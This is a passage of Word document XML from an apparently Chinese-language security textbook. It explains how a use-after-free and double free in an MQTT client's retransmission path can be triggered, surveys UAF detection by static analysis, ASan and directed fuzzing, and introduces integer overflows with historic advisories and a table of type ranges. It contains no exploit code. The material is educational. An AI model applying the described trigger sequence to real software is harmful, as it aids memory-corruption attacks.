                      <w:r w:rsidRPr="00DF7FD3">
                        <w:rPr>
                          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                        </w:rPr>
                        <w:t>}</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BACF5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利用此漏洞时，攻击者首先构造出一个发送失败的操作，使mq-&gt;nsend被置为1且mq-&gt;sendleftover指向发送失败的内存地址；然后执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>mqtt_doing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，将进入i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断内，相当于错误重传操作，并执行free</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>(ptr)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，由于没有将p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>tr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>赋值为NULL，ptr成为野指针；最后再次执行mqtt_doing，进入if判断后，会再次执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>mqtt_send</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，相当于再次发送了错误重传信息，造成了信息泄露，而对ptr的二次释放也会导致程序崩溃。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B1BFA2" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65118112"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4.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>UAF漏洞的检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B916A80"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当前学术界对UAF的漏洞检测可以分为静态检测和动态检测两种形式，对于静态检测，GUEB是唯一的针对UAF的二进制分析器，该技术融合了符号执行来生成PoC输入。并可以基于抽象解释、指针分析、特征匹配或模块检测等技术针对源码进行检测。但静态分析的缺点是无法给出触发UAF漏洞的输入，只能检测到UAF漏洞的存在。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AF9DF8"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对于动态检测，现有的动态UAF检测器主要依赖于高权重的指导，这会导致很高的运行时负担，甚至超过程序本身。ASan能够进行轻量级的指导，但是仅仅针对源码级的程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C1B7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模糊测试是近年来最受欢迎的漏洞检测方法，主要分为Coverage-based Greybox Fuzzing（CGF）和Directed Greybox Fuzzing（DGF）。其中CGF侧重于模糊测试的覆盖范围，追求尽可能地覆盖所有的路径，典型代表有ALF等。而DGF注重定向的测试效果，对于符合某一特征的路径集中测试，典型方法有AFLGo、HAWKEYE等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C6A56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模糊测试检测UAF漏洞主要面临以下几个挑战，首先是复杂性：触发UAF漏洞需要在程序执行中在同一个内存位置触发3个事件序列（即alloc、free和use），同时要按照一定的顺序执行到这三个事件，但是在程序中这些事件跨越了多个函数，这导致要执行到UAF漏洞代码变得复杂。同时UAF漏洞在实际中很难触发，相比于缓冲区溢出只需要一个单独的界外内存访问，UAF具有的时间和空间约束的结合在实践中很难满足。最后UAF漏洞通常不会出现例如段错误这类明显的后果。在这种情况下，如果只是简单地观察计算机崩溃行为就不能检测到测试案例触发了UAF漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C46651" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="000012A0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>整数溢出漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E95FB9B"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计算机中一切信息均以二进制形式存储和计算，整数在计算机中仍以二进制形式处理。计算机中的整数所占的空间为2的指数幂倍，如3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位系统中，short、unsigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>short类型为2字节，int、long、unsigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int、unsigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long为4字节，long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long、unsigned</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>long为8字节；同时计算机中存在两类整数算术运算，有符号运算和无符号运算。在不同类型的整数进行不同类型运算的过程中，会出现整数溢出问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE23C68"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 xml:space="preserve">.4.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>整数溢出案例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7434261D"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2010年</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月24日多家厂商爆出rpc.pcnfsd服务整数溢出漏洞，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>NSFOUCS ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>15091</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。rpc.pcnfsd是一个在网络上提供认证和打印服务的RPC守护进程,运行在大量Unix类操作系统上。多个厂商的Unix系统中所使用的rpc.pcnfsd服务在处理RPC请求时存在整数溢出漏洞。通过利用该漏洞，远程攻击者可以通过发送特制的RPC请求来触发此漏洞，从而控制服务器系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA7198E"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2010年</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>月12日Outlook Express和Windows Mail STAT爆出响应整数溢出漏洞(MS10-030)，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>NSFOUCS ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>15002</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。Outlook Express和Windows Mail 都是Windows操作系统中默认捆绑的邮件和新闻组客户端。OutlookExpress和WindowsMail客户端所使用的通用库验证特制邮件响应的方式存在整数溢出漏洞。如果用户受骗使用POP3和IMAP邮件协议连接到了恶意的服务器并收到了畸形的STAT响应就会触发这个溢出，可能导致在用户系统.上执行任意代码。利用该漏洞，远程攻击者可在用户系统上执行任意代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C092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2013年11月7日GoogleAndroid签名验证安全措施绕过漏洞(含整数溢出原因)，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>NSFOUCS ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>25224</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。Android是基于Linux开放性内核的操作系统，是Google公司在2007年11月5日公布的手机操作系统。Android4.4及其他版本存在安全限制绕过漏洞，攻击者可利用此漏洞绕过某些安全限制以执行未授权操作。攻击者可以利用此漏洞绕过安卓签名检查，从而控制受害者系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F489362"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.4.2 什么是整数溢出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4AEB7F"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计算机中整数都有一个宽度，例如win7下VC6编译器中int类型为32位。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>当试图保存一个比它可以表示的最大值还大的数时，就会发生整数溢出</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>整数溢出将导致“不确定性行为”。比如完全忽略该溢出或终止进程。大多数编译器都会忽略这种溢出，这可能会导致不确定或错误的值保存在了整数变量中</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。不同编译器的整数值范围如表2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B393943"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hint="eastAsia"/>
        </w:rPr>
        <w:t>表2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不同编译器的整数值范围</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05"/>
        <w:gridCol w:w="1449"/>
        <w:gridCol w:w="2342"/>
        <w:gridCol w:w="1874"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="3DBE30C0" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5675D0"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编译器类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68F2886C"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数据类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B688B99"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数据名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34C049CB"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最小值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FDBC916"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最大值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="2E429340" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="446114D6"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V</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>C++ 6.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B691C79"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unsigned short</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A7639C7"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无符号短整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54936FB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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3732ADCE"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6</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>5535</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="6A449575" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="4B17C8CE"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6A7F5668"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s</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>hort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3222D03D"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短整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C9B82A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w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>32768</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74F15B32"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3</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2767</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="4E5E8A16" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="642692ED"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36DF7DB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unsigned int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36E7AE3A"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无符号整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7113B67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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C4CEE4C"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4</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>294967295</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="3EE0A937" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="1BE45BD7"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22A40586"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i</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>nt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0974A4EC"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整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AE7B0E6"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2147483648</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="057A461E"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sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2147483647</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="5F8143D8" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="4BC88549"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66AE2758"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u</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>nsigned</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42285567"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无符号长整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2061229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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4979C4D7"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4</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>294967295</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="4408C8C2" w14:textId="77777777" w:rsidTr="001A34DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1661" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="7D14AA34"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1CD28CF2"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l</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>ong</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5475E3B9"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长整型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49AE18CF"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>2147483648</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1874" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36FA868E"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sz w:val="20"/>
